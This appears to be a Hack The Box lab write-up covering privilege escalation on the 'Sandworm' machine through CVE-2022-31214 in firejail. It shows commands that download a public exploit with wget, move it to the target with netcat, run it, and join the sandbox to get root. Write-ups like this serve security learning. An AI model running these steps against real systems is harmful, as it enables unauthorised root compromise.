InfoSec LAB

Sandworm_Privilege_Escalation

Created: 2 min read

CVE-2022-31214

a vulnerability, which was classified as critical, was found in firejail up to 0.9.68. Affected is an unknown part of the file join.c of the component User Namespace Handler. The manipulation with an unknown input leads to a access control vulnerability. CWE is classifying the issue as CWE-284. The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. This is going to have an impact on confidentiality, integrity, and availability.

Exploit

The author has attached the exploit

┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ wget https://seclists.org/oss-sec/2022/q2/att-188/firejoin_py.bin
--2023-06-29 17:44:12--  https://seclists.org/oss-sec/2022/q2/att-188/firejoin_py.bin
Resolving seclists.org (seclists.org)... 45.33.49.119, 2600:3c01:e000:3e6::6d4e:7061
Connecting to seclists.org (seclists.org)|45.33.49.119|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8651 (8.4K) [application/octet-stream]
Saving to: ‘firejoin_py.bin’
 
firejoin_py.bin  100%[=========>]   8.45K  --.-KB/s    in 0s      
 
2023-06-29 17:44:13 (172 MB/s) - ‘firejoin_py.bin’ saved [8651/8651]
 
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ mv firejoin_py.bin CVE-2022-31214.py

I downloaded the exploit script

Exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ nc $IP 2222 < CVE-2022-31214.py   
 
atlas@sandworm:/dev/shm$ nc -nlvp 2222 > CVE-2022-31214.py
Listening on 0.0.0.0 2222
Connection received on 10.10.14.4 33870
 
atlas@sandworm:/dev/shm$ chmod 755 CVE-2022-31214.py

Delivery complete

atlas@sandworm:/dev/shm$ ./CVE-2022-31214.py 
You can now run 'firejail --join=1048598' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.

Executing the exploit script starts a malicious service; PID 1048598 I’m supposed to join it from another session and switch to the root user

atlas@sandworm:~$ ps 1048598
    PID TTY      STAT   TIME COMMAND
1048598 pts/3    s+     0:00 /usr/bin/python3 /dev/shm/./CVE-2022-31214.py

That’s the exploit service

atlas@sandworm:~$ firejail --join=1048598
changing root to /proc/1048598/root
warning: cleaning all supplementary groups
Child process initialized in 10.50 ms

Joined

Now, switching to the root user

atlas@sandworm:~$ su root
root@sandworm:/home/atlas# whoami
root
root@sandworm:/home/atlas# hostname
sandworm
root@sandworm:/home/atlas# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.218  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:ed83  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:ed83  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:ed:83  txqueuelen 1000  (Ethernet)
        RX packets 3575031  bytes 650882102 (650.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4262699  bytes 1809594963 (1.8 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 12308072  bytes 2191540766 (2.1 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12308072  bytes 2191540766 (2.1 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks